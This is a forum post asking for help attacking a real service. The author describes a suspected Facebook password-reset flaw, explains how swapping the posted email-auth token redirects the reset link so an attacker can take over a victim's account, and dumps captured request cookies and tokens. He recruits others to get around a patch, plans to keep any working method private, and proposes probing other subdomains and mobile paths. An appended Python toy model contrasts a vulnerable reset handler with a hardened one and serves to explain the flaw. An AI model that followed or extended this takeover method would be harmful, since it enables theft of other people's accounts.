Possible Facebook Vuln

gatopardos
Joined: 2012/01/15

Hi, I found a Facebook vulnerability from a Turkish guy. The vulnerability is that if you use a domain level other than www.facebook.com (example: x.facebook.com), the information for the password reminder page is handled differently, and one could TAMPER THE EMAIL AUTH DATA to send the confirmation email to the attacker's email, and this link page doesn't check for previous passwords, so one could change the password and log in without any further ado.

But the attacker must know the victim's email address, and worst of all, they have updated this function since New Year so that the handlers, maybe, check the token packets twice. I need some help; more people = more chances to crack something. They changed the GET function, from what I understand, and they changed the confirmation script URL to hex code?

This vulnerability isn't popular at all, so I'm thinking that they didn't bother to sanitize the code enough to prevent further exploits.

REFERER:        http://x.facebook.com/recover?cuid=AYgN0SgNxgW2gyg-8HgNZ53Cvj5RdK7V7-XXXn_GIk-TYiDlcPthoxSUA-P2d81d7rqGaa_N42VBzYzpaguuGBazBPUUoyGDUBD7YYkhoRNm37SUrL9LvhRh-FX6PetxpYpd5huCZD3c4_RXWhu_hDp0l1n7PEICkppMSK1-gxLFmw&refsrc=http%3A%2F%2Fx.facebook.com%2Frecover&refid=0&_rdr
COOKIE:         datr=RBsUT7FrOTTh_8JqLs5WYnke; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; lsd=LOuM6; m_ts=1326719401; L=2; reg_fb_ref=http%3A%2F%2Fx.facebook.com%2Frecover%3Fcuid%3DAYg4ZfAfedOw7TT_BUj6hKdk1zZTnHulCYjbO8yNLQMQNN6sAflr0uctssfHlsx8M4nM-Fpgn_VuyCM4r7OkEwTjxFiCVAjEOkA9C3T0ZC4Q1PhtfbSjX5ozNgR9M2Xp6IZD4uVzWmS4ifRACfyEDlSvI31zlKV9-1RDdbqRR7Gxiw%26s%3D100%26referer%3Dhttp%253A%252F%252Fx.facebook.com%252Flogin%252Fhelp%252Fidentify%252F%253Fselect_user_url%253D%25252Frecover%2526no_selection_url%253D%25252Fhelp%25252Fcontact.php%25253Fshow_form%25253Dcannot_identify%252526flow%25253Dpw_reset%2526instructions%253Dpassword_reset%2526flow%253Dpw_reset%2526skip_confirmation%253D1%2526refid%253D0%26refid%3D0; W=1326719429; i_id=%3Aasync_conf; sfiu=AYhFUajIX5kqTZc4rD5zdb5Ri7DaNwTXI0okem5R-8UeD17DcmskH82_T89aX8PrCFSchy0rfasQlU4nbt-1CRfrR3ITeCNhsM6_ge-RxD6wf1xR-I2H2JV9LHGy_BeOF0sKEiAr7uQtPaG6T16bhfUli3ggj7NTKkJ4EsRLAEBVFw
LSD:            LOuM6
POSTID:         cda97d47228e889ffc3bd811513b4a0e
CHARSET:        %E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84
EMAIL AUTH:     AYgQ7G_APrmuZFhmHzRx5PFD-WW8O6R4jOb0-I_tJn0FWcR1EvW3aPid6Fj90fGc2D1FuyiFdisBX8SnL5jYjvZ6
CONFIRMATION (do_send_code):    %CE%95%CF%80%CE%B1%CE%BD%CE%B1%CF%86%CE%BF%CF%81%CE%AC+%CE%BA%CF%89%CE%B4%CE%B9%CE%BA%CE%BF%CF%8D+%CF%80%CF%81%CF%8C%CF%83%CE%B2%CE%B1%CF%83%CE%B7%CF%82

Before they patch it, you could pretend that you are the victim asking to reset the password using email, and when you send the data over, change the victim's EMAIL AUTH TOKEN to the attacker's EMAIL AUTH TOKEN, and the link would be sent to the attacker's email so he could change the password. They don't check anything else; if one could get hold of this link, he could steal the victim's account.

Don't leech.

EDIT:

They are using dynamic cookies. This must be what they have changed. If someone wants to work on this, post your findings here.

If one finds something, it's going private.

UPDATE: I thought that if they didn't properly sanitize data before on x.facebook.com, how about testing other domain levels *.facebook.com for the same vulnerability? I know that most mobile browsers don't use dynamic cookies, and I remember that if I log in from an old mobile they use different code from scratch, not only a different layout, because the old mobile browsers have compatibility issues.

1. Use the mobile's HTTP REFERRER? Emulate a mobile environment? How about WAN traffic; it's different from GPRS.

2. Change the mobile's OS and tamper data from it! (I know about booting a mobile with BackTrack, but the WiFi doesn't work yet.)
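The flaw the post describes, reduced to a toy recovery endpoint so the mechanism is visible: the server picks the reset-link recipient by whatever "email auth" identifier the client posted, instead of by the account that is actually under recovery. This is an added example, not code from the original post and not Facebook's code; the account store, session store, token format and the `do_send_code_*`, `start_recovery` and `redeem_reset` functions are all hypothetical. The vulnerable handler is shown beside a hardened one that checks the posted identifier against the server's own record for the account and binds the mailed token to that account with an HMAC.

```python
"""Toy model of a password-recovery flow that trusts a client-supplied
'email auth' identifier, beside a hardened version.

Added example; hypothetical server, accounts and tokens. Not code from the
post or from Facebook.
"""
import hashlib
import hmac
import secrets

# Constructed sample data: two accounts, each with a contact e-mail and an
# opaque "email auth" identifier like the one in the captured request.
ACCOUNTS = {
    "victim": {"email": "victim@example.com", "email_auth": "AYg-victim-opaque"},
    "attacker": {"email": "attacker@example.com", "email_auth": "AYg-attacker-opaque"},
}
# Reverse index: email_auth value -> account that owns it.
EMAIL_AUTH_INDEX = {a["email_auth"]: name for name, a in ACCOUNTS.items()}

SENT_MAIL = []  # (recipient, reset link) pairs; stands in for an SMTP relay


def send_reset_link(recipient, account_name, token):
    """Record the outgoing mail and return the recipient address."""
    SENT_MAIL.append((recipient, f"https://recover.example/reset?u={account_name}&t={token}"))
    return recipient


# --- Vulnerable: the recipient is whoever owns the posted email_auth value.
# Nothing ties that value to cuid_account, so posting the attacker's own
# identifier while recovering the victim mails the link to the attacker.
def do_send_code_vulnerable(cuid_account, posted_email_auth):
    owner = EMAIL_AUTH_INDEX.get(posted_email_auth)
    if owner is None:
        raise ValueError("unknown email auth")
    token = secrets.token_urlsafe(24)
    return send_reset_link(ACCOUNTS[owner]["email"], cuid_account, token)


# --- Hardened: the recovery session fixes which account is being recovered;
# the posted identifier must match the server's record for that account, and
# the token is an HMAC over account, contact and a fresh nonce, so a link
# mailed for one account cannot be redeemed against another.
SERVER_KEY = secrets.token_bytes(32)  # hypothetical per-deployment secret
SESSIONS = {}


def start_recovery(account_name):
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"account": account_name}
    return sid


def _token_tag(account_name, nonce):
    msg = f"{account_name}|{ACCOUNTS[account_name]['email']}|{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()[:32]


def do_send_code_hardened(session_id, posted_email_auth):
    session = SESSIONS[session_id]
    account = session["account"]
    expected = ACCOUNTS[account]["email_auth"].encode()
    # Compare the client's claim against the server's own record, in constant time.
    if not hmac.compare_digest(expected, posted_email_auth.encode()):
        raise PermissionError("email auth does not belong to the account under recovery")
    nonce = secrets.token_urlsafe(16)
    session["reset"] = {"nonce": nonce}
    return send_reset_link(ACCOUNTS[account]["email"], account, f"{nonce}.{_token_tag(account, nonce)}")


def redeem_reset(session_id, account_name, token):
    """True only if the link's token was issued for this session's account."""
    session = SESSIONS[session_id]
    if session["account"] != account_name or "reset" not in session:
        return False
    nonce, _, tag = token.partition(".")
    return nonce == session["reset"]["nonce"] and hmac.compare_digest(_token_tag(account_name, nonce), tag)


if __name__ == "__main__":
    print("vulnerable ->", do_send_code_vulnerable("victim", ACCOUNTS["attacker"]["email_auth"]))
    sid = start_recovery("victim")
    try:
        do_send_code_hardened(sid, ACCOUNTS["attacker"]["email_auth"])
    except PermissionError as exc:
        print("hardened ->", exc)
```

The difference worth noticing is not the token strength but where the recipient decision is made: the vulnerable handler lets the request choose the contact, the hardened one only lets the request confirm a contact the server already associates with the account being recovered, and then makes the mailed token unusable for any other account.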